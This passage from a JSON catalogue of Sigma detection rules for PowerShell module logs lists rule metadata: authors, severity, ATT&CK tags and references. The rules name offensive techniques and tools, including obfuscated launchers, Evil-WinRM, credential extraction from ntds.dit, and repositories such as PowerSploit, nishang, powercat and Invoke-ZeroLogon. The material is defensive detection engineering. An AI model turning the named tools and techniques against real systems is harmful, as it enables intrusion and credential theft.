"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", "value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell" }, { "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-08", "falsepositive": [ "Unknown" ], "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_mhsta.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", "value": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module" }, { "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", "meta": { "author": "frack113", "creation_date": "2021-12-15", "falsepositive": [ "Administrator script" ], "filename": "posh_pm_susp_ad_group_reco.yml", "level": "low", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_ad_group_reco.yml" ], "tags": [ "attack.discovery", "attack.t1069.001" ] }, "related": [ { "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "815bfc17-7fc6-4908-a55e-2f37b98cedb4", "value": "AD Groups Or Users Enumeration Using PowerShell - PoshModule" }, { "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_clip.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", "value": "Invoke-Obfuscation Via Use Clip - PowerShell Module" }, { "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-08-11", "falsepositive": [ "Programs using PowerShell directly without invocation of a dedicated interpreter", "MSP Detection Searcher", 
"Citrix ConfigSync.ps1" ], "filename": "posh_pm_alternate_powershell_hosts.yml", "level": "medium", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "64e8e417-c19a-475a-8d19-98ea705394cc", "value": "Alternate PowerShell Hosts - PowerShell Module" }, { "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dll\" DLL, which is often used by attackers to perform AD enumeration.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2023-01-22", "falsepositive": [ "Legitimate use of the library for administrative activity" ], "filename": "posh_pm_active_directory_module_dll_import.yml", "level": "medium", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/samratashok/ADModule", "https://twitter.com/cyb3rops/status/1617108657166061568?s=20", "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml" ], "tags": [ "attack.reconnaissance", "attack.discovery", "attack.impact" ] }, "uuid": "74176142-4684-4d8a-8b0a-713257e7df8e", "value": "Potential Active Directory Enumeration Using AD Module - PsModule" }, { "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", "meta": { "author": "Timur Zinniatullin, 
oscd.community", "creation_date": "2020-10-18", "falsepositive": [ "Unknown" ], "filename": "posh_pm_invoke_obfuscation_via_rundll.yml", "level": "medium", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_rundll.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a23791fe-8846-485a-b16b-ca691e1b03d4", "value": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module" }, { "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Unknown" ], "filename": "posh_pm_invoke_obfuscation_clip.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_clip.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", "value": "Invoke-Obfuscation CLIP+ Launcher - 
PowerShell Module" }, { "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and\nto identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", "meta": { "author": "frack113", "creation_date": "2021-12-15", "falsepositive": [ "Administrator script" ], "filename": "posh_pm_susp_smb_share_reco.yml", "level": "low", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_smb_share_reco.yml" ], "tags": [ "attack.discovery", "attack.t1069.001" ] }, "related": [ { "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6942bd25-5970-40ab-af49-944247103358", "value": "Suspicious Get Information for SMB Share - PowerShell Module" }, { "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.\n", "meta": { "author": "frack113", "creation_date": "2022-02-21", "falsepositive": [ "Administrator PowerShell scripts" ], "filename": "posh_pm_susp_reset_computermachinepassword.yml", "level": "medium", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", 
"https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml" ], "tags": [ "attack.initial-access", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e3818659-5016-4811-a73c-dde4679169d2", "value": "Suspicious Computer Machine Password by PowerShell" }, { "description": "Detects the execution of Evil-WinRM via PowerShell Module logs by leveraging the hardcoded strings inside the utility.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-02-25", "falsepositive": [ "Unknown" ], "filename": "posh_pm_hktl_evil_winrm_execution.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/search?q=repo%3AHackplayers%2Fevil-winrm++shell.run%28&type=code", "https://github.com/Hackplayers/evil-winrm/blob/7514b055d67ec19836e95c05bd63e7cc47c4c2aa/evil-winrm.rb", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_hktl_evil_winrm_execution.yml" ], "tags": [ "attack.lateral-movement" ] }, "uuid": "9fe55ea2-4cd6-4491-8a54-dd6871651b51", "value": "HackTool - Evil-WinRm Execution - PowerShell Module" }, { "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", "meta": { "author": "frack113", "creation_date": "2021-12-10", "falsepositive": [ "Unknown" ], "filename": "posh_pm_susp_get_nettcpconnection.yml", "level": "low", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_get_nettcpconnection.yml" ], "tags": [ "attack.discovery", "attack.t1049" ] }, "related": [ { "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aff815cc-e400-4bf0-a47a-5d8a2407d4e1", "value": "Use Get-NetTCPConnection - PowerShell Module" }, { "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2020-10-18", "falsepositive": [ "Unknown" ], "filename": "posh_pm_invoke_obfuscation_via_compress.yml", "level": "medium", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_compress.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module" }, { "description": "A General detection for specific decompress commands in PowerShell logs. 
This could be an adversary decompressing files.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-05-02", "falsepositive": [ "Unknown" ], "filename": "posh_pm_decompress_commands.yml", "level": "informational", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/OTRF/detection-hackathon-apt29/issues/8", "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.A.3_09F29912-8E93-461E-9E89-3F06F6763383.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_decompress_commands.yml" ], "tags": [ "attack.defense-evasion", "attack.t1140" ] }, "related": [ { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1ddc1472-8e52-4f7d-9f11-eab14fc171f5", "value": "PowerShell Decompress Commands" }, { "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", "meta": { "author": "frack113", "creation_date": "2021-12-12", "falsepositive": [ "Administrator script" ], "filename": "posh_pm_susp_local_group_reco.yml", "level": "low", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_local_group_reco.yml" ], "tags": [ "attack.discovery", "attack.t1069.001" ] }, "related": [ { 
"dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cef24b90-dddc-4ae1-a09a-8764872f69fc", "value": "Suspicious Get Local Groups Information" }, { "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-23", "falsepositive": [ "Unknown" ], "filename": "posh_pm_exploit_scripts.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", "https://web.archive.org/web/20210511204621/https://github.com/AlsidOfficial/WSUSpendu", "https://github.com/CsEnox/EventViewer-UACBypass", "https://github.com/S3cur3Th1sSh1t/WinPwn", "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", "https://github.com/samratashok/nishang", "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", "https://github.com/nettitude/Invoke-PowerThIEf", "https://github.com/NetSPI/PowerUpSQL", "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", "https://github.com/HarmJ0y/DAMP", "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", "https://github.com/besimorhino/powercat", "https://github.com/PowerShellMafia/PowerSploit", "https://github.com/DarkCoderSc/PowerRunAsSystem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_exploit_scripts.yml" ], "tags": [ 
"attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "41025fd7-0466-4650-a813-574aaacbe7f4", "value": "Malicious PowerShell Scripts - PoshModule" }, { "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-16", "falsepositive": [ "Unknown" ], "filename": "posh_pm_get_addbaccount.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", "https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml" ], "tags": [ "attack.credential-access", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b140afd9-474b-4072-958e-2ebb435abd68", "value": "Suspicious Get-ADDBAccount Usage" }, { "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2019-10-08", "falsepositive": [ "Unknown" ], "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_rundll32.yml" ], "tags": [ 
"attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", "value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module" }, { "description": "Detects PowerShell module creation where the module Contents are set to \"function Get-VMRemoteFXPhysicalVideoAdapter\". This could be a sign of potential abuse of the \"RemoteFXvGPUDisablement.exe\" binary which is known to be vulnerable to module load-order hijacking.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2021-07-13", "falsepositive": [ "Unknown" ], "filename": "posh_pm_remotefxvgpudisablement_abuse.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_remotefxvgpudisablement_abuse.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "38a7625e-b2cb-485d-b83d-aff137d859f4", "value": "Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module" }, { "description": "Detects Commandlet names from well-known PowerShell exploitation 
frameworks", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-20", "falsepositive": [ "Unknown" ], "filename": "posh_pm_malicious_commandlets.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", "https://github.com/adrecon/ADRecon", "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", "https://github.com/samratashok/nishang", "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", "https://github.com/adrecon/AzureADRecon", "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", "https://github.com/besimorhino/powercat", "https://github.com/HarmJ0y/DAMP", "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", "https://adsecurity.org/?p=2921", "https://github.com/DarkCoderSc/PowerRunAsSystem/", "https://github.com/calebstewart/CVE-2021-1675", "https://github.com/Kevin-Robertson/Powermad", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_malicious_commandlets.yml" ], "tags": [ "attack.execution", "attack.discovery", "attack.t1482", "attack.t1087", "attack.t1087.001", "attack.t1087.002", "attack.t1069.001", "attack.t1069.002", "attack.t1069", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", "value": "Malicious PowerShell Commandlets - PoshModule" }, { "description": "Detects suspicious PowerShell download command", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-05", "falsepositive": [ "PowerShell scripts that download content from the Internet" ], "filename": "posh_pm_susp_download.yml", "level": "medium", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfile?view=net-8.0", "https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring?view=net-8.0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_download.yml" ], "tags": [ 
"attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "de41232e-12e8-49fa-86bc-c05c7e722df9", "value": "Suspicious PowerShell Download - PoshModule" }, { "description": "Detects suspicious PowerShell invocation command parameters", "meta": { "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "creation_date": "2017-03-05", "falsepositive": [ "Unknown" ], "filename": "posh_pm_susp_invocation_specific.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_specific.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", "value": "Suspicious PowerShell Invocations - Specific - PowerShell Module" }, { "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ "Unknown" ], "filename": "posh_pm_invoke_obfuscation_var.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_var.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": 
"970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", "value": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module" }, { "description": "Detects remote PowerShell sessions", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "creation_date": "2019-08-10", "falsepositive": [ "Legitimate use of remote PowerShell sessions" ], "filename": "posh_pm_remote_powershell_session.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_remote_powershell_session.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.lateral-movement", "attack.t1021.006" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "96b9f619-aa91-478f-bacb-c3e50f8df575", "value": "Remote PowerShell Session (PS Module)" }, { "description": "Detects Obfuscated Powershell via Stdin in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "posh_pm_invoke_obfuscation_via_stdin.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_stdin.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, 
"related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", "value": "Invoke-Obfuscation Via Stdin - PowerShell Module" }, { "description": "Detects SyncAppvPublishingServer process execution which is usually utilized by adversaries to bypass PowerShell execution restrictions.", "meta": { "author": "Ensar Şamil, @sblmsrsn, OSCD Community", "creation_date": "2020-10-05", "falsepositive": [ "App-V clients" ], "filename": "posh_pm_syncappvpublishingserver_exe.yml", "level": "medium", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", "value": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module" }, { "description": "Detects suspicious PowerShell invocation command parameters", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-12", "falsepositive": [ "Very special / sneaky PowerShell scripts" ], "filename": "posh_pm_susp_invocation_generic.yml", "level": "high", "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_generic.yml" ], "tags": [ "attack.execution", 
